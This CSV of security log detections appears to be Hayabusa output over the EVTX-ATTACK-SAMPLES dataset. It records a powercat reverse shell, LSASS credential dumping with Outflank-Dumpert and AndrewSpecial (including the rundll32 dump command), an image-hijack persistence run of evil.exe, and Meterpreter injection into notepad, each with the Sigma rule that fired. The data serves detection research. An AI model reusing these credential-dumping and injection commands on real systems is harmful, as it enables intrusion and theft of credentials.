2019-06-20 02:23:01.928 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.990 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:02.350 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:10.334 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:11.694 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:11.694 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:50.378 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:58.816 +09:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:58.816 +09:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,rules/sigma/process_creation/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-07-04 05:10:06.475 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx
2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:29.223 +09:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
